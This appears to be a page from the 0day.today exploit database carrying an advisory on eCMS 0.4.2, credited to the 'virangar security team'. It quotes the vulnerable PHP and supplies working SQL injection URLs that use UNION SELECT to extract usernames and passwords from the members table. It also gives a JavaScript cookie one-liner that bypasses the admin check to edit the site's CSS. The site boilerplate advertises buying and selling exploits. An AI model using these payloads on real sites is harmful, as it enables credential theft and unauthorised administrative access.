0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
eCMS 0.4.2 (SQL/PB) Multiple Remote Vulnerabilities
=================================================== eCMS 0.4.2 (SQL/PB) Multiple Remote Vulnerabilities =================================================== ####################################################################################### # # # ...::::eCMS-v0.4.2 (SQL/PB) Multiple Remote Vulnerabilities ::::... # ####################################################################################### -------- Discoverd By :virangar security team(hadihadi) special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hackerz greetz:to my best friend in the world hadi_aryaie2004 & my lovely friend arash(imm02tal) ----- 1.sql injection: -------vuln codes in:----------- index.php: line 52:$p = $_GET['p'] .. .. line 55:$query = "SELECT * FROM files WHERE cat = '$p' ORDER BY date DESC"; --- exploit: http://site.com/[patch]/index.php?p='/**/union/**/select/**/1,concat(username,0x3a,char(58),password),3,4,5,6/**/from/**/members/**/where/**/id=1/* or http://site.com/[patch]/index.php?p='/**/union/**/select/**/1,concat(username,0x3a,char(58),password),3,4,5,6/**/from/**/members/* ##################### 2. Remote Permission Bypass Vulnerability(Insecure Cookie Handling ): -------vuln codes in:----------- editCss.php: line 17:if(!isset($_COOKIE['pass'])) { echo('You\'re not allowed to come here! <a href=admin.php>Go back!</a>'); } else { .... ... ... ------- /* if the cookie didn't set for you, you can't allow to see this page..but if we do somethings :) such as : javascript:document.cookie = "pass=1; path=/"; now the cookie is set for you, and you can allow to see the page and edit the CSS in file "style.css" */ exploit: just open your browser and then type: javascript:document.cookie = "pass=1; path=/"; now see the "editCss.php" and edit the cms CSS :D ----- young iranian h4ck3rz # 0day.today [2024-11-16] #